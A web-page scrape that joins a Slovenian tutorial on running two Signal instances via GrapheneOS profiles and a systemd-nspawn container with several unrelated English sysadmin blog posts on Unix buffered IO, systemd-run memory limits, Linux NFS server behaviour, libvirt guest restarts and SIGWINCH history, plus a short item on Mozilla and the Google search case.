Rešitev je torej preprosta. V mobilnem telefonu z GrapheneOS si odpremo nov profil, tam namestimo novo kopijo Signala, v telefon vstavimo drugo SIM kartico in Signal povežemo z novo številko.

Ko je telefonska številka registrirana, lahko SIM kartico odstranimo in v telefon vstavimo staro. Signal namreč za komunikacijo uporablja samo prenos podatkov (seveda lahko telefon uporabljamo tudi brez SIM kartice, samo na WiFi-ju). Na telefonu imamo sedaj nameščeni dve različici Signala, vezani na dve različni telefonski številki, in iz obeh različic lahko pošiljamo sporočila (tudi med njima dvema!) ali kličemo.

Čeprav so profili ločeni, pa lahko nastavimo, da obvestila iz aplikacije Signal na drugem profilu, dobivamo tudi ko smo prijavljeni v prvi profil. Le za pisanje sporočil ali vzpostavljanje klicev, bo treba preklopiti v pravi profil na telefonu.

Preprosto, kajne?

Poganjanje več različic Signala na računalniku

Zdaj bi si seveda nekaj podobnega želeli tudi na računalniku. Skratka, želeli bi si možnosti, da na računalniku, pod enim uporabnikom poganjamo dve različni instanci Signala (vsaka vezana na svojo telefonsko številko).

No, tukaj je zadeva na prvi pogled malenkost bolj zapletena, a se s pomočjo virtualizacije da težavo elegantno rešiti. Seveda na računalniku samo za Signal ne bomo poganjali kar celega novega virtualnega stroja, lahko pa uporabimo tim. kontejner.

V operacijskem sistemu Linux najprej namestimo aplikacijo systemd-container (v sistemih Ubuntu je sicer že privzeto nameščena).

Na gostiteljskem računalniku omogočimo tim neprivilegirane uporabniške imenske prostore (angl. unprivileged user namespaces), in sicer z ukazom sudo nano /etc/sysctl.d/nspawn.conf, nato pa v datoteko vpišemo:

kernel.unprivileged_userns_clone=1

Zdaj je SistemD storitev treba ponovno zagnati:

sudo systemctl daemon-reload
sudo systemctl restart systemd-sysctl.service
sudo systemctl status systemd-sysctl.service

…nato pa lahko namestimo Debootstrap: sudo apt install debootstrap.

Zdaj ustvarimo nov kontejner, v katerega bomo namestili operacijski sistem Debian (in sicer različico stable) - v resnici bo nameščena le minimalno zahtevana koda operacijskega sistema:

sudo debootstrap --include=systemd,dbus stable

Dobimo približno takle izpis:

/var/lib/machines/debian
I: Keyring file not available at /usr/share/keyrings/debian-archive-keyring.gpg; switching to https mirror https://deb.debian.org/debian
I: Retrieving InRelease 
I: Retrieving Packages 
I: Validating Packages 
I: Resolving dependencies of required packages...
I: Resolving dependencies of base packages...
I: Checking component main on https://deb.debian.org/debian...
I: Retrieving adduser 3.134
I: Validating adduser 3.134
...
...
...
I: Configuring tasksel-data...
I: Configuring libc-bin...
I: Configuring ca-certificates...
I: Base system installed successfully.

Zdaj je kontejner z operacijskim sistemom Debian nameščen. Zato ga zaženemo in nastavimo geslo korenskega uporabnika :

sudo systemd-nspawn -D /var/lib/machines/debian -U --machine debian

Dobimo izpis:

Spawning container debian on /var/lib/machines/debian.
Press Ctrl-] three times within 1s to kill container.
Selected user namespace base 1766326272 and range 65536.
root@debian:~#

Zdaj se preko navideznega terminala povežemo v operacijski sistem in vpišemo naslednja dva ukaza:

passwd
printf 'pts/0\npts/1\n' >> /etc/securetty 

S prvim ukazom nastavimo geslo, drugi pa omogoči povezavo preko tim. lokalnega terminala (TTY). Na koncu vpišemo ukaz logout in se odjavimo nazaj na gostiteljski računalnik.

Zdaj je treba nastaviti omrežje, ki ga bo uporabljal kontejner. Najbolj enostavno je, če uporabimo kar omrežje gostiteljskega računalnika. Vpišemo naslednja dva ukaza:

sudo mkdir /etc/systemd/nspawn
sudo nano /etc/systemd/nspawn/debian.nspawn

V datoteko vnesemo:

[Network]
VirtualEthernet=no

Zdaj kontejner ponovno zaženemo z ukazom sudo systemctl start systemd-nspawn@debian ali pa še enostavneje - machinectl start debian.

Seznam zagnanih kontejnerjev si lahko tudi ogledamo:

machinectl list
MACHINE CLASS     SERVICE        OS     VERSION ADDRESSES
debian  container systemd-nspawn debian 12      -        

1 machines listed.

Oziroma se povežemo v ta virtualni kontejner: machinectl login debian. Dobimo izpis:

Connected to machine debian. Press ^] three times within 1s to exit session.

Debian GNU/Linux 12 cryptopia pts/1

cryptopia login: root
Password: 

Na izpisu se vidi, da smo se povezali z uporabnikom root in geslom, ki smo ga prej nastavili.

Zdaj v tem kontejnerju namestimo Signal Desktop.

apt update
apt install wget gpg

wget -O- https://updates.signal.org/desktop/apt/keys.asc | gpg --dearmor > signal-desktop-keyring.gpg

echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/signal-desktop-keyring.gpg] https://updates.signal.org/desktop/apt xenial main' | tee /etc/apt/sources.list.d/signal-xenial.list

apt update
apt install --no-install-recommends signal-desktop
halt

Z zadnjim ukazom kontejner zaustavimo. Zdaj je v njem nameščena sveža različica aplikacije Signal Desktop.

Mimogrede, če želimo, lahko kontejner preimenujemo v bolj prijazno ime, npr. sudo machinectl rename debian debian-signal. Seveda pa bomo potem isto ime morali uporabljati tudi za zagon kontejnerja (torej, machinectl login debian-signal).

Zdaj naredimo skripto, s katero bomo kontejner pognali in v njem zagnali Signal Desktop na način, da bomo njegovo okno videli na namizju gostiteljskega računalnika:

Ustvarimo datoteko nano /opt/runContainerSignal.sh (ki jo shranimo npr. v mapo /opt), vsebina datoteke pa je naslednja:

#!/bin/sh
xhost +local:
pkexec systemd-nspawn --setenv=DISPLAY=:0 \
                      --bind-ro=/tmp/.X11-unix/  \
                      --private-users=pick \
                      --private-users-chown \
                      -D /var/lib/machines/debian-signal/ \
                      --as-pid2 signal-desktop --no-sandbox
xhost -local:

S prvim xhost ukazom omogočimo povezovanje na naš zaslon, vendar samo iz lokalnega računalnika, drugi xhost ukaz pa bo te povezave (na zaslon) spet blokiral). Nastavimo, da je skripta izvršljiva (chmod +x runContainerSignal.sh), in to je to.

Dve ikoni aplikacije Signal Desktop

Dve ikoni aplikacije Signal Desktop

No, ne še čisto, saj bi skripto morali zaganjati v terminalu, veliko bolj udoben pa je zagon s klikom na ikono.

Naredimo torej .desktop datoteko: nano ~/.local/share/applications/runContainerSignal.desktop. Vanjo zapišemo naslednjo vsebino:

[Desktop Entry]
Type=Application
Name=Signal Container
Exec=/opt/runContainerSignal.sh
Icon=security-high
Terminal=false
Comment=Run Signal Container

…namesto ikone security-high, lahko uporabimo kakšno drugo, na primer:

Icon=/usr/share/icons/Yaru/scalable/status/security-high-symbolic.svg

Pojasnilo: skripta je shranjena v ~/.local/share/applications/, torej je dostopa samo specifičnemu uporabniku in ne vsem uporabnikom na računalniku.

Zdaj nastavimo, da je .desktop datoteka izvršljiva: chmod +x ~/.local/share/applications/runContainerSignal.desktop

Osvežimo tim. namizne vnose (angl. Desktop Entries): update-desktop-database ~/.local/share/applications/, in to je to!

Dve instanci aplikacije Signal Desktop

Dve instanci aplikacije Signal Desktop"

Ko bomo v iskalnik aplikacij vpisali “Signal Container”, se bo prikazala ikona aplikacije, sklikom na njo pa bomo zagnali Signal v kontejnerju (bo pa za zagon potrebno vpisati geslo).

Zdaj ta Signal Desktop samo še povežemo s kopijo Signala na telefonu in že lahko na računalniku uporabljamo dve kopiji aplikacije Signal Desktop.

Kaj pa…?

Žal pa v opisanem primeru ne deluje dostop do kamere in zvoka. Klice bomo torej še vedno morali opravljati iz telefona.

Izkaže se namreč, da je povezava kontejnerja z zvočnim sistemom PipeWire in kamero gostiteljskega računalnika neverjetno zapletena (vsaj v moji postavitvi sistema). Če imate namig kako zadevo rešiti, pa mi seveda lahko sporočite. :)

Mozilla Is Worried About the Proposed Fixes for Google’s Search Monopoly

By: Nick Heer

Michael Kan, PC Magazine:

Mozilla points to a key but less eye-catching proposal from the DOJ to regulate Google’s search business, which a judge ruled as a monopoly in August. In their recommendations, federal prosecutors urged the court to ban Google from offering “something of value” to third-party companies to make Google the default search engine over their software or devices. 

“The proposed remedies are designed to end Google’s unlawful practices and open up the market for rivals and new entrants to emerge,” the DOJ told the court. The problem is that Mozilla earns most of its revenue from royalty deals — nearly 86% in 2022 — making Google the default Firefox browser search engine.

This is probably another reason why U.S. prosecutors want to jettison Chrome from Google: they want to reduce any benefit it may accrue from trying to fix its illegal search monopoly. But it seems Google’s position in the industry is so entrenched that correcting it will hurt lots of other businesses, too. That does not mean it should not be broken up or that the DOJ’s proposed remedies are wrong, however.

⌥ Permalink

Unix's buffered IO in assembly and in C

By: cks

Recently on the Fediverse, I said something related to Unix's pre-V7 situation with buffered IO:

[...]

(I think the V1 approach is right for an assembly based minimal OS, while the stdio approach kind of wants malloc() and friends.)

The V1 approach, as documented in its putc.3 and getw.3 manual pages, is that the caller to the buffered IO routines supplies the data area used for buffering, and the library functions merely initialize it and later use it. How you get the data area is up to you and your program; you might, for example, simply have a static block of memory in your BSS segment. You can dynamically allocate this area if you want to, but you don't have to. The V2 and later putchar have a similar approach but this time they contain a static buffer area and you just have to do a bit of initialization (possibly putchar was in V1 too, I don't know for sure).

Stdio of course has a completely different API. In stdio, you don't provide the data area; instead, stdio provides you an opaque reference (a 'FILE *') to the information and buffers it maintains internally. This is an interface that definitely wants some degree of dynamic memory allocation, for example for the actual buffers themselves, and in modern usage most of the FILE objects will be dynamically allocated too.

(The V7 stdio implementation had a fixed set of FILE structs and so would error out if you used too many of them. However, it did use malloc() for the buffer associated with them, in filbuf.c and flsbuf.c.)

You can certainly do dynamic memory allocation in assembly, but I think it's much more natural in C, and certainly the C standard library is more heavyweight than the relatively small and minimal assembly language stuff early Unix programs (written in assembly) seem to have required. So I think it makes a lot of sense that Unix started with a buffering approach where the caller supplies the buffer (and probably doesn't dynamically allocate it), then moved to one where the library does at least some allocation and supplies the buffer (and other data) itself.

Buffered IO in Unix before V7 introduced stdio

By: cks

I recently read Julia Evans' Why pipes sometimes get "stuck": buffering. Part of the reason is that almost every Unix program does some amount of buffering for what it prints (or writes) to standard output and standard error. For C programs, this buffering is built into the standard library, specifically into stdio, which includes familiar functions like printf(). Stdio is one of the many things that appeared first in Research Unix V7. This might leave you wondering if this sort of IO was buffered in earlier versions of Research Unix and if it was, how it was done.

The very earliest version of Research Unix is V1, and in V1 there is putc.3 (at that point entirely about assembly, since C was yet to come). This set of routines allows you to set up and then use a 'struct' to implement IO buffering for output. There is a similar set of buffered functions for input, in getw.3, and I believe the memory blocks the two sets of functions use are compatible with each other. The V1 manual pages note it as a bug that the buffer wasn't 512 bytes, but also notes that several programs would break if the size was changed; the buffer size will be increased to 512 bytes by V3.

In V2, I believe we still have putc and getw, but we see the first appearance of another approach, in putchr.s. This implements putchar(), which is used by printf() and which (from later evidence) uses an internal buffer (under some circumstances) that has to be explicitly flush()'d by programs. In V3, there's manual pages for putc.3 and getc.3 that are very similar to the V1 versions, which is why I expect these were there in V2 as well. In V4, we have manual pages for both putc.3 (plus getc.3) and putch[a]r.3, and there is also a getch[a]r.3 that's the input version of putchar(). Since we have a V4 manual page for putchar(), we can finally see the somewhat tangled way it works, rather than having to read the PDP-11 assembly. I don't have links to V5 manuals, but the V5 library source says that we still have both approaches to buffered IO.

(If you want to see how the putchar() approach was used, you can look at, for example, the V6 grep.c, which starts out with the 'fout = dup(1);' that the manual page suggests for buffered putchar() usage, and then periodically calls flush().)

In V6, there is a third approach that was added, in /usr/source/iolib, although I don't know if any programs used it. Iolib has a global array of structs, that were statically associated with a limited number of low-numbered file descriptors; an iolib function such as cflush() would be passed a file descriptor and use that to look up the corresponding struct. One innovation iolib implicitly adds is that its copen() effectively 'allocates' the struct for you, in contrast to putc() and getc(), where you supply the memory area and fopen()/fcreate() merely initialize it with the correct information.

Finally V7 introduces stdio and sorts all of this out, at the cost of some code changes. There's still getc() and putc(), but now they take a FILE *, instead of their own structure, and you get the FILE * from things like fopen() instead of supplying it yourself and having a stdio function initialize it. Putchar() (and getchar()) still exist but are now redone to work with stdio buffering instead of their own buffering, and 'flush()' has become fflush() and takes an explicit FILE * argument instead of implicitly flushing putchar()'s buffer, and generally it's not necessary any more. The V7 grep.c still uses printf(), but now it doesn't explicitly flush anything by calling fflush(); it just trusts in stdio.

Using systemd-run to limit something's memory usage in cgroups v2

By: cks

Once upon a time I wrote an entry about using systemd-run to limit something's RAM consumption. This was back in the days of cgroups v1 (also known as 'non-unified cgroups'), and we're now in the era of cgroups v2 ('unified cgroups') and also ZRAM based swap. This means we want to make some adjustments, especially if you're dealing with programs with obnoxiously large RAM usage.

As before, the basic thing you want to do is run your program or thing in a new systemd user scope, which is done with 'systemd-run --user --scope ...'. You may wish to give it a unit name as well, '--unit <name>', especially if you expect it to persist a while and you want to track it specifically. Systemd will normally automatically clean up this scope when everything in it exits, and the scope is normally connected to your current terminal and otherwise more or less acts normally as an interactive process.

To actually do anything with this, we need to set some systemd resource limits. To limit memory usage, the minimum is a MemoryMax= value. It may also work better to set MemoryHigh= to a value somewhat below the absolute limit of MemoryMax. If you're worried about whatever you're doing running your system out of memory and your system uses ZRAM based swap, you may also want to set a MemoryZSwapMax= value so that the program doesn't chew up all of your RAM by 'swapping' it to ZRAM and filling that up. Without a ZRAM swap limit, you might find that the program actually uses MemoryMax RAM plus your entire ZRAM swap RAM, which might be enough to trigger a more general OOM. So this might be:

systemd-run --user --scope -p MemoryHigh=7G -p MemoryMax=8G -p MemoryZSwapMax=1G ./mach build

(Good luck with building Firefox in merely 8 GBytes of RAM, though. And obviously if you do this regularly, you're going to want to script it.)

If you normally use ZRAM based swap and you're worried about the program running you out of memory that way, you may want to create some actual swap space that the program can be turned loose on. These days, this is as simple as creating a 'swap.img' file somewhere and then swapping onto it:

cd /
dd if=/dev/zero of=swap.img bs=1MiB count=$((4*1024))
mkswap swap.img
swapon /swap.img

(You can use swapoff to stop swapping to this image file after you're done running your big program.)

Then you may want to also limit how much of this swap space the program can use, which is done with a MemorySwapMax= value. I've read both systemd's documentation and the kernel's cgroup v2 memory controller documentation, and I can't tell whether the ZRAM swap maximum is included in the swap maximum or is separate. I suspect that it's included in the swap maximum, but if it really matters you should experiment.

If you also want to limit the program's CPU usage, there are two options. The easiest one to set is CPUQuota=. The drawback of CPU quota limits is that programs may not realize that they're being restricted by such a limit and wind up running a lot more threads (or processes) than they should, increasing the chances of overloading things. The more complex but more legible to programs way is to restrict what CPUs they can run on using taskset(1).

(While systemd has AllowedCPUs=, this is a cgroup setting and doesn't show up in the interface used by taskset and sched_getaffinity(2).)

Systemd also has CPUWeight=, but I have limited experience with it; see fair share scheduling in cgroup v2 for what I know. You might want the special value 'idle' for very low priority programs.

What NFS server threads do in the Linux kernel

By: cks

If we ignore the network stack and take an abstract view, the Linux kernel NFS server needs to do things at various different levels in order to handle NFS client requests. There is NFS specific processing (to deal with things like the NFS protocol and NFS filehandles), general VFS processing (including maintaining general kernel information like dentries), then processing in whatever specific filesystem you're serving, and finally some actual IO if necessary. In the abstract, there are all sorts of ways to split up the responsibility for these various layers of processing. For example, if the Linux kernel supported fully asynchronous VFS operations (which it doesn't), the kernel NFS server could put all of the VFS operations in a queue and let the kernel's asynchronous 'IO' facilities handle them and notify it when a request's VFS operations were done. Even with synchronous VFS operations, you could split the responsibility between some front end threads that handled the NFS specific side of things and a backend pool of worker threads that handled the (synchronous) VFS operations.

(This would allow you to size the two pools differently, since ideally they have different constraints. The NFS processing is more or less CPU bound, and so sized based on how much of the server's CPU capacity you wanted to use for NFS; the VFS layer would ideally be IO bound, and could be sized based on how much simultaneous disk IO it was sensible to have. There is some hand-waving involved here.)

The actual, existing Linux kernel NFS server takes the much simpler approach. The kernel NFS server threads do everything. Each thread takes an incoming NFS client request (or a group of them), does NFS level things like decoding NFS filehandles, and then calls into the VFS to actually do operations. The VFS will call into the filesystem, still in the context of the NFS server thread, and if the filesystem winds up doing IO, the NFS server thread will wait for that IO to complete. When the thread of execution comes back out of the VFS, the NFS thread then does the NFS processing to generate replies and dispatch them to the network.

This unfortunately makes it challenging to answer the question of how many NFS server threads you want to use. The NFS server threads may be CPU bound (if they're handling NFS requests from RAM and the VFS's caches and data structures), or they may be IO bound (as they wait for filesystem IO to be performed, usually for reading and writing files). When you're IO bound, you probably want enough NFS server threads so that you can wait on all of the IO and still have some threads left over to handle the collection of routine NFS requests that can be satisfied from RAM. When you're CPU bound, you don't want any more NFS server threads than you have CPUs, and maybe you want a bit less.

If you're lucky, your workload is consistently and predictably one or the other. If you're not lucky (and we're not), your workload can be either of these at different times or (if we're really out of luck) both at once. Energetic people with NFS servers that have no other real activity can probably write something that automatically tunes the number of NFS threads up and down in response to a combination of the load average, the CPU utilization, and pressure stall information.

(We're probably just going to set it to the number of system CPUs.)

(After yesterday's question I decided I wanted to know for sure what the kernel's NFS server threads were used for, just in case. So I read the kernel code, which did have some useful side effects such as causing me to learn that the various nfsd4_<operation> functions we sometimes use bpftrace on are doing less than I assumed they were.)

The question of how many NFS server threads you should use (on Linux)

By: cks

Today, not for the first time, I noticed that one of our NFS servers was sitting at a load average of 8 with roughly half of its overall CPU capacity used. People with experience in Linux NFS servers are now confidently predicting that this is a 16-CPU server, which is correct (it has 8 cores and 2 HT threads per core). They're making this prediction because the normal Linux default number of kernel NFS server threads to run is eight.

(Your distribution may have changed this, and if so it's most likely by changing what's in /etc/nfs.conf, which is the normal place to set this. It can be changed on the fly by writing a new value to /proc/fs/nfsd/threads.)

Our NFS server wasn't saturating its NFS server threads because someone on a NFS client was doing a ton of IO. That might actually have slowed the requests down. Instead, there were some number of programs that were constantly making some number of NFS requests that could be satisfied entirely from (server) RAM, which explains why all of the NFS kernel threads were busy using system CPU (mostly on a spinlock, apparently, according to 'perf top'). It's possible that some of these constant requests came from code that was trying to handle hot reloading, since this is one of the sources of constant NFS 'GetAttr' requests, but I believe there's other things going on.

(Since this is the research side of a university department, we have very little visibility into what the graduate students are running on places like our little SLURM cluster.)

If you search around the Internet, you can find all sorts of advice about what to to set the number of NFS server threads to on your Linux NFS server. Many of them involve relatively large numbers (such as this 2024 SuSE advice of 128 threads). Having gone through this recent experience, my current belief is that it depends on what your problem is. In our case, with the NFS server threads all using kernel CPU time and not doing much else, running more threads than we have CPUs seems pointless; all it would do is create unproductive contention for CPU time. If NFS clients are going to totally saturate the fileserver with (CPU-eating) requests even at 16 threads, possibly we should run fewer threads than CPUs, so that user level management operations have some CPU available without contending against the voracious appetite of the kernel NFS server.

(Some advice suggests some number of server NFS kernel threads per NFS client. I suspect this advice is not used in places with tens or hundreds of NFS clients, which is our situation.)

To figure out what your NFS server's problem is, I think you're going to need to look at things like pressure stall information and information on the IO rate and the number of IO requests you're seeing. You can't rely on overall iowait numbers, because Linux iowait is a conservative lower bound. IO pressure stall information is much better for telling you if some NFS threads are blocked on IO even while others are active.

(Unfortunately the kernel NFS threads are not in a cgroup of their own, so you can't get per-cgroup pressure stall information for them. I don't know if you can manually move them into a cgroup, or if systemd would cooperate with this if you tried it.)

PS: In theory it looks like a potentially reasonable idea to run roughly at least as many NFS kernel threads as you have CPUs (maybe a few less so you have some user level CPU left over). However, if you have a lot of CPUs, as you might on modern servers, this might be too many if your NFS server gets flooded with an IO-heavy workload. Our next generation NFS fileserver hardware is dual socket, 12 cores per socket, and 2 threads per core, for a total of 48 CPUs, and I'm not sure we want to run anywhere near than many NFS kernel threads. Although we probably do want to run more than eight.

Ubuntu LTS (server) releases have become fairly similar to each other

By: cks

Ubuntu 24.04 LTS was released this past April, so one of the things we've been doing since then is building out our install system for 24.04 and then building a number of servers using 24.04, both new servers and servers that used to be build on 20.04 or 22.04. What has been quietly striking about this process is how few changes there have been for us between 20.04, 22.04, and 24.04. Our customization scripts needed only very small changes, and many of the instructions for specific machines could be revised by just searching and replacing either '20.04' or '22.04' with '24.04'.

Some of this lack of changes is illusory, because when I actually look at the differences between our 22.04 and 24.04 postinstall scripting, there are a number of changes, adjustments, and new fixes (and a big change in having to install Python 2 ourselves). Even when we didn't do anything there were decisions to be made, like whether or not we would stick with the Ubuntu 24.04 default of socket activated SSH (our decision so far is to stick with 24.04's default for less divergence from upstream). And there were also some changes to remove obsolete things and restructure how we change things like the system-wide SSH configuration; these aren't forced by the 22.04 to 24.04 change, but building the install setup for a new release is the right time to rethink existing pieces.

However, plenty of this lack of changes is real, and I credit a lot of that to systemd. Systemd has essentially standardized a lot of the init process and in the process, substantially reduced churn in it. For a relevant example, our locally developed systemd units almost never need updating between Ubuntu versions; if it worked in 20.04, it'll still work just as well in 24.04 (including its relationships to various other units). Another chunk of this lack of changes is that the current 20.04+ Ubuntu server installer has maintained a stable configuration file and relatively stable feature set (at least of features that we want to use), resulting in very little needing to be modified in our spin of it as we moved from 20.04 to 22.04 to 24.04. And the experience of going through the server installer has barely changed; if you showed me an installer screen from any of the three releases, I'm not sure I could tell you which it's from.

I generally feel that this is a good thing, at least on servers. A normal Linux server setup and the software that you run on it has broadly reached a place of stability, where there's no particular need to make really visible changes or to break backward compatibility. It's good for us that moving from 20.04 to 22.04 to 24.04 is mostly about getting more recent kernels and more up to date releases of various software packages, and sometimes having bugs fixed so that things like bpftrace work better.

(Whether this is 'welcome maturity' or 'unwelcome statis' is probably somewhat in the eye of the observer. And there are quiet changes afoot behind the scenes, like the change from iptables to nftables.)

Complications in supporting 'append to a file' in a NFS server

By: cks

In the comments of my entry on the general problem of losing network based locks, an interesting side discussion has happened between commentator abel and me over NFS servers (not) supporting the Unix O_APPEND feature. The more I think about it, the more I think it's non-trivial to support well in an NFS server and that there are some subtle complications (and probably more than I haven't realized). I'm mostly going to restrict this to something like NFS v3, which is what I'm familiar with.

The basic Unix semantics of O_APPEND are that when you perform a write(), all of your data is immediately and atomically put at the current end of the file, and the file's size and maximum offset are immediately extended to the end of your data. If you and I do a single append write() of 128 Mbytes to the same file at the same time, either all of my 128 Mbytes winds up before yours or vice versa; your and my data will never wind up intermingled.

This basic semantics is already a problem for NFS because NFS (v3) connections have a maximum size for single NFS 'write' operations and that size may be (much) smaller than the user level write(). Without a multi-operation transaction of some sort, we can't reliably perform append write()s of more data than will fit in a NFS write operation; either we fail those 128 Mbyte writes, or we have the possibility that data from you and I will be intermingled in the file.

In NFS v2, all writes were synchronous (or were supposed to be, servers sometimes lied about this). NFS v3 introduced the idea of asynchronous, buffered writes that were later committed by clients. NFS servers are normally permitted to discard asynchronous writes that haven't yet been committed by the client; when the client tries to commit them later, the NFS server rejects the commit and the client resends the data. This works fine when the client's request has a definite position in the file, but it has issues if the client's request is a position-less append write. If two clients do append writes to the same file, first A and then B after it, the server discards both, and then client B is the first one to go through the 'COMMIT, fail, resend' process, where does its data wind up? It's not hard to wind up with situations where a third client that's repeatedly reading the file will see inconsistent results, where first it sees A's data then B's and then later either it sees B's data before A's or B's data without anything from A (not even a zero-filled gap in the file, the way you'd get with ordinary writes).

(While we can say that NFS servers shouldn't ever deliberately discard append writes, one of the ways that this happens is that the server crashes and reboots.)

You can get even more fun ordering issues created by retrying lost writes if there is another NFS client involved that is doing manual append writes by finding out the current end of file and writing at it. If A and B do append writes, C does a manual append write, all writes are lost before they're committed, B redoes, C redoes, and then A redoes, a natural implementation could easily wind up with B's data, an A data sized hole, C's data, and then A's data appended after C's.

This also creates server side ordering dependencies for potentially discarding uncommitted asynchronous write data, ones that a NFS server can normally make independently. If A appended a lot of data and then B appended a little bit, you probably don't want to discard A's data but not B's, because there's no guarantee that A will later show up to fail a COMMIT and resend it (A could have crashed, for example). And if B requests a COMMIT, you probably want to commit A's data as well, even if there's much more of it.

One way around this would be to adopt a more complex model of append writes over NFS, where instead of the client requesting an append write, it requests 'write this here but fail if this is not the current end of file'. This would give all NFS writes a definite position in the file at the cost of forcing client retries on the initial request (if the client later has to repeat the write because of a failed commit, it must carefully strip this flag off). Unfortunately a file being appended to from multiple clients at a high rate would probably result in a lot of client retries, with no guarantee that a given client would ever actually succeed.

(You could require all append writes to be synchronous, but then this would do terrible things to NFS server performance for potentially common use of append writes, like appending log lines to a shared log file from multiple machines. And people absolutely would write and operate programs like that if append writes over NFS were theoretically reliable.)

Losing NFS locks and the SunOS SIGLOST signal

By: cks

NFS is a network filesystem that famously also has a network locking protocol associated with it (or part of it, for NFSv4). This means that NFS has to consider the issue of the NFS client losing a lock that it thinks it holds. In NFS, clients losing locks normally happens as part of NFS(v3) lock recovery, triggered when a NFS server reboots. On server reboot, clients are told to re-acquire all of their locks, and this re-acquisition can explicitly fail (as well as going wrong in various ways that are one way to get stuck NFS locks). When a NFS client's kernel attempts to reclaim a lock and this attempt fails, it has a problem. Some process on the local machine thinks that it holds a (NFS) lock, but as far as the NFS server and other NFS clients are concerned, it doesn't.

Sun's original version of NFS dealt with this problem with a special signal, SIGLOST. When the NFS client's kernel detected that a NFS lock had been lost, it sent SIGLOST to whatever process held the lock. SIGLOST was a regular signal, so by default the process would exit abruptly; a process that wanted to do something special could register a signal handler for SIGLOST and then do whatever it could. SIGLOST appeared no later than SunOS 3.4 (cf) and still lives on today in Illumos, where you can find this discussed in uts/common/klm/nlm_client.c and uts/common/fs/nfs/nfs4_recovery.c (and it's also mentioned in fcntl(2)). The popularity of actually handling SIGLOST may be indicated by the fact that no program in the Illumos source tree seems to set a signal handler for it.

Other versions of Unix mainly ignore the situation. The Linux kernel has a specific comment about this in fs/lockd/clntproc.c, which very briefly talks about the issue and picks ignoring it (apart from logging the kernel message "lockd: failed to reclaim lock for ..."). As far as I can tell from reading FreeBSD's sys/nlm/nlm_advlock.c, FreeBSD silently ignores any problems when it goes through the NFS client process of reclaiming locks.

(As far as I can see, NetBSD and OpenBSD don't support NFS locks on clients at all, rendering the issue moot. I don't know if POSIX locks fail on NFS mounted filesystems or if they work but create purely local locks on that particular NFS client, although I think it's the latter.)

On the surface this seems rather bad, and certainly worse than the Sun approach of SIGLOST. However, I'm not sure that SIGLOST is all that great either, because it has some problems. First, what you can do in a signal handler is very constrained; basically all that a SIGLOST handler can do is set a variable and hope that the rest of the code will check it before it does anything dangerous. Second, programs may hold multiple (NFS) locks and SIGLOST doesn't tell you which lock you lost; as far as I know, there's no way of telling. If your program gets a SIGLOST, all you can do is assume that you lost all of your locks. Third, file locking may quite reasonably be used inside libraries in a way that is hidden from callers by the library's API, but signals and handling signals is global to the entire program. If taking a file lock inside a library exposes the entire program to SIGLOST, you have a collection of problems (which ones depend on whether the program has its own file locks and whether or not it has installed a SIGLOST handler).

This collection of problems may go part of the way to explain why no Illumos programs actually set a SIGLOST handler and why other Unixes simply ignore the issue. A kernel that uses SIGLOST essentially means 'your program dies if it loses a lock', and it's not clear that this is better than 'your program optimistically continues', especially in an environment where a NFS client losing a NFS lock is rare (and letting the program continue is certainly simpler for the kernel).

A rough equivalent to "return to last power state" for libvirt virtual machines

By: cks

Physical machines can generally be set in their BIOS so that if power is lost and then comes back, the machine returns to its previous state (either powered on or powered off). The actual mechanics of this are complicated (also), but the idealized version is easily understood and convenient. These days I have a revolving collection of libvirt based virtual machines running on a virtualization host that I periodically reboot due to things like kernel updates, and for a while I have quietly wished for some sort of similar libvirt setting for its virtual machines.

It turns out that this setting exists, sort of, in the form of the libvirt-guests systemd service. If enabled, it can be set to restart all guests that were running when the system was shut down, regardless of whether or not they're set to auto-start on boot (none of my VMs are). This is a global setting that applies to all virtual machines that were running at the time the system went down, not one that can be applied to only some VMs, but for my purposes this is sufficient; it makes it less of a hassle to reboot the virtual machine host.

Linux being Linux, life is not quite this simple in practice, as is illustrated by comparing my Ubuntu VM host machine with my Fedora desktops. On Ubuntu, libvirt-guests.service defaults to enabled, it is configured through /etc/default/libvirt-guests (the Debian standard), and it defaults to not not automatically restarting virtual machines. On my Fedora desktops, libvirt-guests.service is not enabled by default, it is configured through /etc/sysconfig/libvirt-guests (as in the official documentation), and it defaults to automatically restarting virtual machines. Another difference is that Ubuntu has a /etc/default/libvirt-guests that has commented out default values, while Fedora has no /etc/sysconfig/libvirt-guests so you have to read the script to see what the defaults are (on Fedora, this is /usr/libexec/libvirt-guests.sh, on Ubuntu /usr/lib/libvirt/libvirt-guests.sh).

I've changed my Ubuntu VM host machine so that it will automatically restart previously running virtual machines on reboot, because generally I leave things running intentionally there. I haven't touched my Fedora machines so far because by and large I don't have any regularly running VMs, so if a VM is still running when I go to reboot the machine, it's most likely because I forgot I had it up and hadn't gotten around to shutting it off.

(My pre-libvirt virtualization software was much too heavy-weight for me to leave a VM running without noticing, but libvirt VMs have a sufficiently low impact on my desktop experience that I can and have left them running without realizing it.)

The history of Unix's ioctl and signal about window sizes

By: cks

One of the somewhat obscure features of Unix is that the kernel has a specific interface to get (and set) the 'window size' of your terminal, and can also send a Unix signal to your process when that size changes. The official POSIX interface for the former is tcgetwinsize(), but in practice actual Unixes have a standard tty ioctl for this, TIOCGWINSZ (see eg Linux ioctl_tty(2) (also) or FreeBSD tty(4)). The signal is officially standardized by POSIX as SIGWINCH, which is the name it always has had. Due to a Fediverse conversation, I looked into the history of this today, and it turns out to be more interesting than I expected.

(The inclusion of these interfaces in POSIX turns out to be fairly recent.)

As far as I can tell, 4.2 BSD did not have either TIOCGWINSZ or SIGWINCH (based on its sigvec(2) and tty(4) manual pages). Both of these appear in the main BSD line in 4.3 BSD, where sigvec(2) has added SIGWINCH (as the first new signal along with some others) and tty(4) has TIOCGWINSZ. This timing makes a certain amount of sense in Unix history. At the time of 4.2 BSD's development and release, people were connecting to Unix systems using serial terminals, which had more or less fixed sizes that were covered by termcap's basic size information. By the time of 4.3 BSD in 1986, Unix workstations existed and with them, terminal windows that could have their size changed on the fly; a way of finding out (and changing) this size was an obvious need, along with a way for full-screen programs like vi to get notified if their terminal window was resized on the fly.

However, as far as I can tell 4.3 BSD itself did not originate SIGWINCH, although it may be the source of TIOCGWINSZ. The FreeBSD project has manual pages for a variety of Unixes, including 'Sun OS 0.4', which seems to be an extremely early release from early 1983. This release has a signal(2) with a SIGWINCH signal (using signal number 28, which is what 4.3 BSD will use for it), but no (documented) TIOCGWINSZ. However, it does have some programs that generate custom $TERMCAP values with the right current window sizes.

